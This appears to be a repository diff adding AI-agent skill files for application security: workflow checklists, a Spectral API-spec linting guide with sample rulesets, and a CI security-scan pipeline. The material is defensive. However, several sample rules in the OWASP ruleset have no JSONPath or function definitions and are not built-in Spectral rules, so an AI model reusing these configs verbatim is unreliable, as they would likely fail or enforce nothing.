- If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)
- If CVSS < 4.0 → Priority: Low (action within 30 days)
3. Apply appropriate remediation pattern
4. Validate fix with security testing
5. Document changes and update security documentation
---
## Pattern 3: Iterative Workflow
Use this pattern for operations that repeat across multiple targets or items.
### Code Security Review Workflow
For each file in the review scope:
1. Identify security-sensitive operations (auth, data access, crypto, input handling)
2. Check against secure coding patterns for the language
3. Flag potential vulnerabilities with severity rating
4. Map findings to CWE and OWASP categories
5. Suggest specific remediation approaches
6. Document finding with code location and fix priority
Continue until all files in scope have been reviewed.
---
## Pattern 4: Feedback Loop Workflow
Use this pattern when validation and iteration are required.
### Secure Configuration Generation Workflow
1. Generate initial security configuration based on requirements
2. Run validation script: `./scripts/validate_config.py config.yaml`
3. Review validation output:
- Note all errors (must fix)
- Note all warnings (should fix)
- Note all info items (consider)
4. Fix identified issues in configuration
5. Repeat steps 2-4 until validation passes with zero errors
6. Review warnings and determine if they should be addressed
7. Apply configuration once validation is clean
**Validation Loop**: Run validator → Fix errors → Repeat until clean
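A minimal shell sketch of that loop, assuming the validator exits non-zero while errors remain:
```bash
# Re-run the validator until it reports a clean configuration
until ./scripts/validate_config.py config.yaml; do
  echo "Validation failed - fix the reported errors, then press Enter to re-run"
  read -r
done
echo "Validation clean - configuration ready to apply"
```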
---
## Pattern 5: Parallel Analysis Workflow
Use this pattern when multiple independent analyses can run concurrently.
### Comprehensive Security Scan Workflow
Run these scans in parallel:
**Static Analysis**:
[ ] 1a. Run SAST scan (Semgrep/Bandit)
[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)
[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)
[ ] 1d. Run license compliance check
**Dynamic Analysis**:
[ ] 2a. Run DAST scan (ZAP/Burp)
[ ] 2b. Run API security testing
[ ] 2c. Run authentication/authorization testing
**Infrastructure Analysis**:
[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)
[ ] 3b. Run container image scan (Trivy/Grype)
[ ] 3c. Run configuration review
**Consolidation**:
[ ] 4. Aggregate all findings
[ ] 5. Deduplicate and correlate findings
[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)
[ ] 7. Generate unified security report
---
## Pattern 6: Research and Documentation Workflow
Use this pattern for security research and documentation tasks.
### Threat Modeling Workflow
Research Progress:
[ ] 1. Identify system components and boundaries
[ ] 2. Map data flows between components
[ ] 3. Identify trust boundaries
[ ] 4. Enumerate assets (data, services, credentials)
[ ] 5. Apply STRIDE framework to each component:
- Spoofing threats
- Tampering threats
- Repudiation threats
- Information disclosure threats
- Denial of service threats
- Elevation of privilege threats
[ ] 6. Map threats to MITRE ATT&CK techniques
[ ] 7. Identify existing mitigations
[ ] 8. Document residual risks
[ ] 9. Recommend additional security controls
[ ] 10. Generate threat model document
Work through each step systematically. Check off completed items.
---
## Pattern 7: Compliance Validation Workflow
Use this pattern for compliance checks against security standards.
### Security Compliance Audit Workflow
**SOC 2 Controls Review**:
[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)
[ ] 2. Verify logical access controls implementation (CC6.1)
[ ] 3. Review authentication mechanisms (CC6.1)
[ ] 4. Verify encryption implementation (CC6.1, CC6.7)
[ ] 5. Review audit logging configuration (CC7.2)
[ ] 6. Verify security monitoring (CC7.2, CC7.3)
[ ] 7. Review incident response procedures (CC7.3, CC7.4)
[ ] 8. Verify backup and recovery processes (A1.2, A1.3)
**Evidence Collection**:
[ ] 9. Collect policy documents
[ ] 10. Collect configuration screenshots
[ ] 11. Collect audit logs
[ ] 12. Document control gaps
[ ] 13. Generate compliance report
---
## Pattern 8: Incident Response Workflow
Use this pattern for security incident handling.
### Security Incident Response Workflow
**Detection and Analysis**:
[ ] 1. Confirm security incident (rule out false positive)
[ ] 2. Determine incident severity (SEV1/2/3/4)
[ ] 3. Identify affected systems and data
[ ] 4. Preserve evidence (logs, memory dumps, network captures)
**Containment**:
[ ] 5. Isolate affected systems (network segmentation)
[ ] 6. Disable compromised accounts
[ ] 7. Block malicious indicators (IPs, domains, hashes)
[ ] 8. Implement temporary compensating controls
**Eradication**:
[ ] 9. Identify root cause
[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)
[ ] 11. Patch vulnerabilities exploited
[ ] 12. Reset compromised credentials
**Recovery**:
[ ] 13. Restore systems from clean backups (if needed)
[ ] 14. Re-enable systems with monitoring
[ ] 15. Verify system integrity
[ ] 16. Resume normal operations
**Post-Incident**:
[ ] 17. Document incident timeline
[ ] 18. Identify lessons learned
[ ] 19. Update security controls to prevent recurrence
[ ] 20. Update incident response procedures
[ ] 21. Communicate with stakeholders
---
## Usage Guidelines
### When to Use Workflow Checklists
**Use checklists for**:
- Complex multi-step operations
- Operations requiring specific order
- Security assessments and audits
- Incident response procedures
- Compliance validation tasks
**Don't use checklists for**:
- Simple single-step operations
- Highly dynamic exploratory work
- Operations that vary significantly each time
### Adapting This Template
1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file
2. **Customize steps** to match your specific security tool or process
3. **Add framework references** (OWASP, CWE, NIST) where applicable
4. **Include tool-specific commands** for automation
5. **Add decision points** where manual judgment is required
### Checklist Best Practices
- **Be specific**: "Run semgrep --config=auto ." not "Scan the code"
- **Include success criteria**: "Validation passes with 0 errors"
- **Reference standards**: Link to OWASP, CWE, NIST where relevant
- **Show progress**: Checkbox format helps track completion
- **Provide escape hatches**: "If validation fails, see troubleshooting.md"
### Integration with Feedback Loops
Combine checklists with validation scripts for maximum effectiveness:
1. Create checklist for the workflow
2. Provide validation script that checks quality
3. Include "run validator" step in checklist
4. Loop: Complete step → Validate → Fix issues → Re-validate
This pattern dramatically improves output quality through systematic validation.

View File

@@ -0,0 +1,708 @@
---
name: api-spectral
description: >
API specification linting and security validation using Stoplight's Spectral with support for
OpenAPI, AsyncAPI, and Arazzo specifications. Validates API definitions against security best
practices, OWASP API Security Top 10, and custom organizational standards. Use when: (1) Validating
OpenAPI/AsyncAPI specifications for security issues and design flaws, (2) Enforcing API design
standards and governance policies across API portfolios, (3) Creating custom security rules for
API specifications in CI/CD pipelines, (4) Detecting authentication, authorization, and data
exposure issues in API definitions, (5) Ensuring API specifications comply with organizational
security standards and regulatory requirements.
version: 0.1.0
maintainer: SirAppSec
category: appsec
tags: [api-security, openapi, asyncapi, linting, spectral, api-governance, owasp-api, specification-validation]
frameworks: [OWASP]
dependencies:
tools: [node, npm]
optional: [docker, git]
references:
- https://docs.stoplight.io/docs/spectral/674b27b261c3c-overview
- https://github.com/stoplightio/spectral
- https://owasp.org/API-Security/editions/2023/en/0x11-t10/
---
# API Security with Spectral
## Overview
Spectral is a flexible JSON/YAML linter from Stoplight that validates API specifications against
security best practices and organizational standards. With built-in rulesets for OpenAPI v2/v3.x,
AsyncAPI v2.x, and Arazzo v1.0, Spectral helps identify security vulnerabilities, design flaws,
and compliance issues during the API design phase—before code is written. Custom rulesets enable
enforcement of OWASP API Security Top 10 patterns, authentication standards, and data protection
requirements across your entire API portfolio.
## Quick Start
### Installation
```bash
# Install via npm
npm install -g @stoplight/spectral-cli
# Or using Yarn
yarn global add @stoplight/spectral-cli
# Or using Docker
docker pull stoplight/spectral
# Verify installation
spectral --version
```
### Basic API Specification Linting
```bash
# Lint OpenAPI specification with built-in rules
spectral lint openapi.yaml
# Lint with specific ruleset
spectral lint openapi.yaml --ruleset .spectral.yaml
# Output as JSON for CI/CD integration
spectral lint openapi.yaml --format json --output results.json
```
### Quick Security Scan
```bash
# Create security-focused ruleset
echo 'extends: ["spectral:oas"]' > .spectral.yaml
# Lint API specification
spectral lint api-spec.yaml --ruleset .spectral.yaml
```
## Core Workflow
### Workflow Checklist
Progress:
[ ] 1. Install Spectral and select appropriate base rulesets
[ ] 2. Create or configure ruleset with security rules
[ ] 3. Identify API specifications to validate (OpenAPI, AsyncAPI, Arazzo)
[ ] 4. Run linting with appropriate severity thresholds
[ ] 5. Review findings and categorize by security impact
[ ] 6. Map findings to OWASP API Security Top 10
[ ] 7. Create custom rules for organization-specific security patterns
[ ] 8. Integrate into CI/CD pipeline with failure thresholds
[ ] 9. Generate reports with remediation guidance
[ ] 10. Establish continuous validation process
Work through each step systematically. Check off completed items.
### Step 1: Ruleset Configuration
Create a `.spectral.yaml` ruleset extending built-in security rules:
```yaml
# .spectral.yaml - Basic security-focused ruleset
extends: ["spectral:oas", "spectral:asyncapi"]
rules:
# Enforce HTTPS for all API endpoints
oas3-valid-schema-example: true
oas3-server-not-example.com: true
# Authentication security
operation-security-defined: error
# Information disclosure prevention
info-contact: warn
info-description: warn
```
**Built-in Rulesets:**
- `spectral:oas` - OpenAPI v2/v3.x security and best practices
- `spectral:asyncapi` - AsyncAPI v2.x validation rules
- `spectral:arazzo` - Arazzo v1.0 workflow specifications
**Ruleset Selection Best Practices:**
- Start with built-in rulesets and progressively add custom rules
- Use `error` severity for critical security issues (authentication, HTTPS)
- Use `warn` for recommended practices and information disclosure risks
- Use `info` for style guide compliance and documentation completeness
For advanced ruleset patterns, see `references/ruleset_patterns.md`.
### Step 2: Security-Focused API Linting
Run Spectral with security-specific validation:
```bash
# Comprehensive security scan
spectral lint openapi.yaml \
--ruleset .spectral.yaml \
--format stylish \
--verbose
# Focus on error-level findings only (critical security issues)
spectral lint openapi.yaml \
--ruleset .spectral.yaml \
--fail-severity error
# Scan multiple specifications
spectral lint api-specs/*.yaml --ruleset .spectral.yaml
# Generate JSON report for further analysis
spectral lint openapi.yaml \
--ruleset .spectral.yaml \
--format json \
--output security-findings.json
```
**Output Formats:**
- `stylish` - Human-readable terminal output (default)
- `json` - Machine-readable JSON for CI/CD integration
- `junit` - JUnit XML for test reporting platforms
- `html` - HTML report (requires additional plugins)
- `github-actions` - GitHub Actions annotations format
### Step 3: OWASP API Security Validation
Validate API specifications against OWASP API Security Top 10:
```yaml
# .spectral-owasp.yaml - OWASP API Security focused rules
extends: ["spectral:oas"]
rules:
# API1:2023 - Broken Object Level Authorization
operation-security-defined:
severity: error
message: "All operations must have security defined (OWASP API1)"
# API2:2023 - Broken Authentication
security-schemes-defined:
severity: error
message: "API must define security schemes (OWASP API2)"
# API3:2023 - Broken Object Property Level Authorization
no-additional-properties:
severity: warn
message: "Consider disabling additionalProperties to prevent data leakage (OWASP API3)"
# API5:2023 - Broken Function Level Authorization
operation-tag-defined:
severity: warn
message: "Operations should be tagged for authorization policy mapping (OWASP API5)"
# API2:2023 - Broken Authentication (insecure scheme)
no-http-basic:
  severity: error
  message: "HTTP Basic auth transmits credentials in plain text (OWASP API2)"
# API8:2023 - Security Misconfiguration
servers-use-https:
description: All server URLs must use HTTPS
severity: error
given: $.servers[*].url
then:
function: pattern
functionOptions:
match: "^https://"
message: "Server URL must use HTTPS (OWASP API8)"
# API9:2023 - Improper Inventory Management
api-version-required:
severity: error
given: $.info
then:
field: version
function: truthy
message: "API version must be specified (OWASP API9)"
```
**Run OWASP-focused validation:**
```bash
spectral lint openapi.yaml --ruleset .spectral-owasp.yaml
```
For complete OWASP API Security Top 10 rule mappings, see `references/owasp_api_mappings.md`.
### Step 4: Custom Security Rule Development
Create organization-specific security rules using Spectral's rule engine:
```yaml
# .spectral-custom.yaml
extends: ["spectral:oas"]
rules:
# Require API key authentication
require-api-key-auth:
description: All APIs must support API key authentication
severity: error
given: $.components.securitySchemes[*]
then:
field: type
function: enumeration
functionOptions:
values: [apiKey, oauth2, openIdConnect]
message: "API must define apiKey, OAuth2, or OpenID Connect security"
# Prevent PII in query parameters
no-pii-in-query:
description: Prevent PII exposure in URL query parameters
severity: error
given: $.paths[*][*].parameters[?(@.in == 'query')].name
then:
function: pattern
functionOptions:
notMatch: "(ssn|social.?security|credit.?card|password|secret|token)"
message: "Query parameters must not contain PII identifiers"
# Require rate limiting headers
require-rate-limit-headers:
description: API responses should include rate limit headers
severity: warn
given: $.paths[*][*].responses[*].headers
then:
function: schema
functionOptions:
schema:
type: object
properties:
X-RateLimit-Limit: true
X-RateLimit-Remaining: true
message: "Consider adding rate limit headers for security"
# Enforce consistent error responses
error-response-format:
description: Error responses must follow standard format
severity: error
given: $.paths[*][*].responses[?(@property >= 400)].content.application/json.schema
then:
function: schema
functionOptions:
schema:
type: object
required: [error, message]
properties:
error:
type: string
message:
type: string
message: "Error responses must include 'error' and 'message' fields"
```
**Custom Rule Development Resources:**
- `references/custom_rules_guide.md` - Complete rule authoring guide with functions
- `references/custom_functions.md` - Creating custom JavaScript/TypeScript functions
- `assets/rule-templates/` - Reusable rule templates for common security patterns
### Step 5: CI/CD Pipeline Integration
Integrate Spectral into continuous integration workflows:
**GitHub Actions:**
```yaml
# .github/workflows/api-security-lint.yml
name: API Security Linting
on: [push, pull_request]
jobs:
spectral:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Setup Node.js
uses: actions/setup-node@v3
with:
node-version: '18'
- name: Install Spectral
run: npm install -g @stoplight/spectral-cli
- name: Lint API Specifications
run: |
spectral lint api-specs/*.yaml \
--ruleset .spectral.yaml \
--format github-actions \
--fail-severity error
- name: Generate Report
if: always()
run: |
spectral lint api-specs/*.yaml \
--ruleset .spectral.yaml \
--format json \
--output spectral-report.json
- name: Upload Report
if: always()
uses: actions/upload-artifact@v3
with:
name: spectral-security-report
path: spectral-report.json
```
**GitLab CI:**
```yaml
# .gitlab-ci.yml
api-security-lint:
stage: test
image: node:18
script:
- npm install -g @stoplight/spectral-cli
- spectral lint api-specs/*.yaml --ruleset .spectral.yaml --fail-severity error
artifacts:
when: always
reports:
junit: spectral-report.xml
```
**Docker-Based Pipeline:**
```bash
# Run in CI/CD with Docker
docker run --rm \
-v $(pwd):/work \
stoplight/spectral lint /work/openapi.yaml \
--ruleset /work/.spectral.yaml \
--format json \
--output /work/results.json
# Fail build on critical security issues
if jq -e '.[] | select(.severity == 0)' results.json > /dev/null; then
echo "Critical security issues detected!"
exit 1
fi
```
For complete CI/CD integration examples, see `scripts/ci_integration_examples/`.
### Step 6: Results Analysis and Remediation
Analyze findings and provide security remediation:
```bash
# Parse Spectral JSON output for security report
python3 scripts/parse_spectral_results.py \
--input spectral-report.json \
--output security-report.html \
--map-owasp \
--severity-threshold error
# Generate remediation guidance
python3 scripts/generate_remediation.py \
--input spectral-report.json \
--output remediation-guide.md
```
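If the bundled parser is not available, the core of its severity summary can be approximated with a short script. The following is a minimal sketch, assuming Spectral's default JSON formatter output (a flat array of findings with `code`, `message`, `severity` 0-3, and `source` fields) - it is not the bundled `parse_spectral_results.py`:
```python
#!/usr/bin/env python3
"""Minimal sketch of Spectral JSON post-processing (illustrative only)."""
import json
import sys
from collections import Counter

SEVERITY_NAMES = {0: "error", 1: "warn", 2: "info", 3: "hint"}

def summarize(path: str) -> int:
    with open(path) as fh:
        findings = json.load(fh)  # Spectral's JSON formatter emits a flat array of findings
    counts = Counter(SEVERITY_NAMES.get(item["severity"], "unknown") for item in findings)
    for level in ("error", "warn", "info", "hint"):
        print(f"{level}: {counts.get(level, 0)}")
    for item in findings:
        if item["severity"] == 0:  # surface error-level findings for triage
            print(f"[{item['code']}] {item['message']} ({item.get('source', 'unknown')})")
    return counts.get("error", 0)

if __name__ == "__main__":
    report = sys.argv[1] if len(sys.argv) > 1 else "spectral-report.json"
    sys.exit(1 if summarize(report) else 0)
```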
**Validation Workflow:**
1. Review all error-level findings (critical security issues)
2. Verify each finding in API specification context
3. Map findings to OWASP API Security Top 10 categories
4. Prioritize by severity and exploitability
5. Apply fixes to API specifications
6. Re-lint to verify remediation
7. Document security decisions and exceptions
**Feedback Loop Pattern:**
```bash
# 1. Initial lint
spectral lint openapi.yaml --ruleset .spectral.yaml -o scan1.json
# 2. Apply security fixes to API specification
# 3. Re-lint to verify fixes
spectral lint openapi.yaml --ruleset .spectral.yaml -o scan2.json
# 4. Compare results
python3 scripts/compare_spectral_results.py scan1.json scan2.json
```
## Advanced Patterns
### Pattern 1: Multi-Specification Governance
Enforce consistent security standards across API portfolio:
```bash
# Scan all API specifications with organization ruleset
find api-specs/ -name "*.yaml" -o -name "*.json" | while read spec; do
echo "Linting: $spec"
spectral lint "$spec" \
--ruleset .spectral-org-standards.yaml \
--format json \
--output "reports/$(basename $spec .yaml)-report.json"
done
# Aggregate findings across portfolio
python3 scripts/aggregate_api_findings.py \
--input-dir reports/ \
--output portfolio-security-report.html
```
### Pattern 2: Progressive Severity Enforcement
Start with warnings and progressively enforce stricter rules:
```yaml
# .spectral-phase1.yaml - Initial rollout (warnings only)
extends: ["spectral:oas"]
rules:
servers-use-https: warn
operation-security-defined: warn
# .spectral-phase2.yaml - Enforcement phase (errors)
extends: ["spectral:oas"]
rules:
servers-use-https: error
operation-security-defined: error
```
```bash
# Phase 1: Awareness (don't fail builds)
spectral lint openapi.yaml --ruleset .spectral-phase1.yaml
# Phase 2: Enforcement (fail on violations)
spectral lint openapi.yaml --ruleset .spectral-phase2.yaml --fail-severity error
```
### Pattern 3: API Security Pre-Commit Validation
Prevent insecure API specifications from being committed:
```bash
#!/bin/bash
# .git/hooks/pre-commit
# Find staged API specification files
SPECS=$(git diff --cached --name-only --diff-filter=ACM | grep -E '\.(yaml|yml|json)$' | grep -E '(openapi|swagger|api)')
if [ -n "$SPECS" ]; then
echo "Validating API specifications..."
for spec in $SPECS; do
spectral lint "$spec" --ruleset .spectral.yaml --fail-severity error
if [ $? -ne 0 ]; then
echo "Security validation failed for $spec"
exit 1
fi
done
fi
```
### Pattern 4: Automated Security Review Comments
Generate security review comments for pull requests:
```bash
# Generate PR review comments from Spectral findings
spectral lint openapi.yaml \
--ruleset .spectral.yaml \
--format json | \
python3 scripts/generate_pr_comments.py \
--file openapi.yaml \
--severity error,warn \
--output pr-comments.md
# Post to GitHub PR via gh CLI
gh pr comment $PR_NUMBER --body-file pr-comments.md
```
## Custom Functions for Advanced Security Rules
Create custom JavaScript functions for complex security validation:
```javascript
// spectral-functions/check-jwt-expiry.js
export default (targetVal, opts) => {
// Validate that bearer security schemes explicitly declare the JWT format
if (targetVal.type === 'http' && targetVal.scheme === 'bearer') {
if (!targetVal.bearerFormat || targetVal.bearerFormat !== 'JWT') {
return [{
message: 'Bearer authentication should specify JWT format'
}];
}
}
return [];
};
```
```yaml
# .spectral.yaml with custom function
functions:
- check-jwt-expiry
functionsDir: ./spectral-functions
rules:
jwt-security-check:
description: Validate JWT security configuration
severity: error
given: $.components.securitySchemes[*]
then:
function: check-jwt-expiry
```
For complete custom function development guide, see `references/custom_functions.md`.
## Automation & Continuous Validation
### Scheduled API Security Scanning
```bash
# Automated daily API specification scanning
./scripts/spectral_scheduler.sh \
--schedule daily \
--specs-dir api-specs/ \
--ruleset .spectral-owasp.yaml \
--output-dir scan-results/ \
--alert-on error \
--slack-webhook $SLACK_WEBHOOK
```
### API Specification Monitoring
```bash
# Monitor API specifications for security regressions
./scripts/spectral_monitor.sh \
--baseline baseline-scan.json \
--current-scan latest-scan.json \
--alert-on-new-findings \
--email security-team@example.com
```
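The bundled scheduler and monitor scripts wrap standard Spectral CLI calls. If they are unavailable, a minimal cron-friendly wrapper is one possible starting point - paths, ruleset name, and the `SLACK_WEBHOOK` variable are illustrative assumptions:
```bash
#!/bin/bash
# Minimal daily-scan sketch (cron-friendly); adjust paths and notification to your environment
set -euo pipefail
OUT="scan-results/$(date +%F).json"
mkdir -p scan-results
if ! spectral lint "api-specs/**/*.yaml" \
     --ruleset .spectral-owasp.yaml \
     --format json \
     --output "$OUT" \
     --fail-severity error; then
  # Non-zero exit indicates error-level findings (or a lint failure) - notify the team
  curl -s -X POST -H 'Content-Type: application/json' \
       -d "{\"text\":\"Spectral found error-level API findings: $OUT\"}" \
       "$SLACK_WEBHOOK"
fi
```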
## Security Considerations
- **Specification Security**: API specifications may contain sensitive information (internal URLs, authentication schemes) - control access and sanitize before sharing
- **Rule Integrity**: Protect ruleset files from unauthorized modification - store in version control with code review requirements
- **False Positives**: Manually review findings before making security claims - context matters for API design decisions
- **Specification Versioning**: Maintain version history of API specifications to track security improvements over time
- **Secrets in Specs**: Never include actual credentials, API keys, or secrets in example values - use placeholder values only (see the snippet after this list)
- **Compliance Mapping**: Document how Spectral rules map to compliance requirements (PCI-DSS, GDPR, HIPAA)
- **Governance Enforcement**: Define exception process for legitimate rule violations with security team approval
- **Audit Logging**: Log all Spectral scans, findings, and remediation actions for security auditing
- **Access Control**: Restrict modification of security rulesets to designated API security team members
- **Continuous Validation**: Re-validate API specifications whenever they change or when new security rules are added
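As a minimal illustration of the placeholder-only guidance above (scheme and property names are illustrative):
```yaml
# Excerpt: example values use obvious placeholders, never live credentials
components:
  securitySchemes:
    ApiKeyAuth:
      type: apiKey
      in: header
      name: X-API-Key
  schemas:
    Credentials:
      type: object
      properties:
        apiKey:
          type: string
          example: "<YOUR_API_KEY>"  # placeholder, not a real key
```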
## Bundled Resources
### Scripts (`scripts/`)
- `parse_spectral_results.py` - Parse Spectral JSON output and generate security reports with OWASP mapping
- `generate_remediation.py` - Generate remediation guidance based on Spectral findings
- `compare_spectral_results.py` - Compare two Spectral scans to track remediation progress
- `aggregate_api_findings.py` - Aggregate findings across multiple API specifications
- `spectral_ci.sh` - CI/CD integration wrapper with exit code handling
- `spectral_scheduler.sh` - Scheduled scanning with alerting
- `spectral_monitor.sh` - Continuous monitoring with baseline comparison
- `generate_pr_comments.py` - Convert Spectral findings to PR review comments
### References (`references/`)
- `owasp_api_mappings.md` - Complete OWASP API Security Top 10 rule mappings
- `custom_rules_guide.md` - Custom rule authoring with examples
- `custom_functions.md` - Creating custom JavaScript/TypeScript validation functions
- `ruleset_patterns.md` - Reusable ruleset patterns for common security scenarios
- `api_security_checklist.md` - API security validation checklist
### Assets (`assets/`)
- `spectral-owasp.yaml` - Comprehensive OWASP API Security Top 10 ruleset
- `spectral-org-template.yaml` - Organization-wide API security standards template
- `github-actions-template.yml` - Complete GitHub Actions workflow
- `gitlab-ci-template.yml` - GitLab CI integration template
- `rule-templates/` - Reusable security rule templates
## Common Patterns
### Pattern 1: Security-First API Design Validation
Validate API specifications during design phase:
```bash
# Design phase validation (strict security rules)
spectral lint api-design.yaml \
--ruleset .spectral-owasp.yaml \
--fail-severity warn \
--verbose
```
### Pattern 2: API Specification Diff Analysis
Detect security regressions between API versions:
```bash
# Compare two API specification versions
spectral lint api-v2.yaml --ruleset .spectral.yaml -o v2-findings.json
spectral lint api-v1.yaml --ruleset .spectral.yaml -o v1-findings.json
python3 scripts/compare_spectral_results.py \
--baseline v1-findings.json \
--current v2-findings.json \
--show-regressions
```
### Pattern 3: Multi-Environment API Security
Different rulesets for development, staging, production:
```yaml
# .spectral-dev.yaml (permissive)
extends: ["spectral:oas"]
rules:
servers-use-https: warn
# .spectral-prod.yaml (strict)
extends: ["spectral:oas"]
rules:
servers-use-https: error
operation-security-defined: error
```
## Integration Points
- **CI/CD**: GitHub Actions, GitLab CI, Jenkins, CircleCI, Azure DevOps
- **API Gateways**: Kong, Apigee, AWS API Gateway (validate specs before deployment)
- **IDE Integration**: VS Code extension, JetBrains plugins for real-time validation
- **API Documentation**: Stoplight Studio, Swagger UI, Redoc
- **Issue Tracking**: Jira, GitHub Issues, Linear (automated ticket creation for findings - see the sketch after this list)
- **API Governance**: Backstage, API catalogs (enforce standards across portfolios)
- **Security Platforms**: Defect Dojo, SIEM platforms (via JSON export)
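As one sketch of the issue-tracking integration, error-level Spectral findings can be turned into tickets with the GitHub CLI - this assumes an authenticated `gh` and an existing `security` label, both illustrative:
```bash
# Illustrative: open one GitHub issue per error-level Spectral finding
jq -c '.[] | select(.severity == 0)' spectral-report.json | while read -r finding; do
  title=$(printf '%s' "$finding" | jq -r '"[API Security] " + .code')
  body=$(printf '%s' "$finding" | jq -r '.message + "\n\nSource: " + (.source // "unknown")')
  gh issue create --title "$title" --body "$body" --label security
done
```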
## Troubleshooting
### Issue: Too Many False Positives
**Solution**:
- Start with `error` severity only: `spectral lint --fail-severity error`
- Progressively add rules and adjust severity levels
- Use an `overrides` section in the ruleset to exclude specific paths (see the sketch below)
- See `references/ruleset_patterns.md` for filtering strategies
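A minimal `overrides` sketch, for example (file globs and rule selections are illustrative):
```yaml
# .spectral.yaml (excerpt) - relax or silence rules for noisy or legacy paths
extends: ["spectral:oas"]
overrides:
  - files:
      - "legacy-apis/**/*.yaml"
    rules:
      servers-use-https: "warn"
      no-additional-properties: "off"
```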
### Issue: Custom Rules Not Working
**Solution**:
- Verify JSONPath expressions using online JSONPath testers
- Check rule syntax with `spectral lint openapi.yaml --ruleset .spectral.yaml --verbose`
- Use `--verbose` flag to see which rules are being applied
- Test rules in isolation before combining them
### Issue: Performance Issues with Large Specifications
**Solution**:
- Exclude noisy sections (for example `components.examples`) with an `overrides` block in the ruleset
- Temporarily set expensive rules to `off` in the ruleset while iterating
- Split large specifications into smaller modules
- Run Spectral in parallel for multiple specifications
### Issue: CI/CD Integration Failing
**Solution**:
- Check Node.js version compatibility (requires Node 14+)
- Verify ruleset path is correct relative to specification file
- Use `--fail-severity` to control when builds should fail
- Review exit codes in `scripts/spectral_ci.sh`
## References
- [Spectral Documentation](https://docs.stoplight.io/docs/spectral/674b27b261c3c-overview)
- [Spectral GitHub Repository](https://github.com/stoplightio/spectral)
- [OWASP API Security Top 10](https://owasp.org/API-Security/editions/2023/en/0x11-t10/)
- [OpenAPI Specification](https://spec.openapis.org/oas/latest.html)
- [AsyncAPI Specification](https://www.asyncapi.com/docs/reference/specification/latest)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,357 @@
# Security-Enhanced CI/CD Pipeline Template
#
# This template demonstrates security best practices for CI/CD pipelines.
# Adapt this template to your specific security tool and workflow needs.
#
# Key Security Features:
# - SAST (Static Application Security Testing)
# - Dependency vulnerability scanning
# - Secrets detection
# - Infrastructure-as-Code security scanning
# - Container image scanning
# - Security artifact uploading for compliance
name: Security Scan Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main, develop]
schedule:
# Run weekly security scans on Sunday at 2 AM UTC
- cron: '0 2 * * 0'
workflow_dispatch: # Allow manual trigger
# Security: Restrict permissions to minimum required
permissions:
contents: read
security-events: write # For uploading SARIF results
pull-requests: write # For commenting on PRs
env:
# Configuration
SECURITY_SCAN_FAIL_ON: 'critical,high' # Fail build on these severities
REPORT_DIR: 'security-reports'
jobs:
# Job 1: Static Application Security Testing (SAST)
sast-scan:
name: SAST Security Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history for better analysis
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Run SAST Scanner
run: |
mkdir -p ${{ env.REPORT_DIR }}
# Example: Using Semgrep for SAST
pip install semgrep
semgrep --config=auto \
--json \
--output ${{ env.REPORT_DIR }}/sast-results.json \
. || true
# Alternative: Bandit for Python projects
# pip install bandit
# bandit -r . -f json -o ${{ env.REPORT_DIR }}/bandit-results.json
- name: Process SAST Results
run: |
# Parse results and fail on critical/high severity
python3 -c "
import json
import sys
with open('${{ env.REPORT_DIR }}/sast-results.json') as f:
results = json.load(f)
critical = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'ERROR'])
high = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'WARNING'])
print(f'Critical findings: {critical}')
print(f'High findings: {high}')
if critical > 0:
print('❌ Build failed: Critical security issues found')
sys.exit(1)
elif high > 0:
print('⚠️ Warning: High severity issues found')
# Optionally fail on high severity
# sys.exit(1)
else:
print('✅ No critical security issues found')
"
- name: Upload SAST Results
if: always()
uses: actions/upload-artifact@v4
with:
name: sast-results
path: ${{ env.REPORT_DIR }}/sast-results.json
retention-days: 30
# Job 2: Dependency Vulnerability Scanning
dependency-scan:
name: Dependency Vulnerability Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Scan Python Dependencies
if: hashFiles('requirements.txt') != ''
run: |
mkdir -p ${{ env.REPORT_DIR }}
pip install safety
safety check --json > ${{ env.REPORT_DIR }}/safety-results.json || true
- name: Scan Node Dependencies
if: hashFiles('package.json') != ''
run: |
mkdir -p ${{ env.REPORT_DIR }}
npm audit --json > ${{ env.REPORT_DIR }}/npm-audit.json || true
- name: Process Dependency Results
run: |
# Check for critical vulnerabilities
if [ -f "${{ env.REPORT_DIR }}/safety-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/safety-results.json')); print(len([v for v in data.get('vulnerabilities', []) if v.get('severity', '').lower() == 'critical']))")
echo "Critical vulnerabilities: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "❌ Build failed: Critical vulnerabilities in dependencies"
exit 1
fi
fi
- name: Upload Dependency Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: dependency-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 3: Secrets Detection
secrets-scan:
name: Secrets Detection
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history to scan all commits
- name: Run Gitleaks
uses: gitleaks/gitleaks-action@v2
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
GITLEAKS_ENABLE_SUMMARY: true
- name: Alternative - TruffleHog Scan
if: false # Set to true to enable
run: |
pip install truffleHog
trufflehog --json --regex --entropy=True . \
> ${{ env.REPORT_DIR }}/trufflehog-results.json || true
- name: Upload Secrets Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: secrets-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
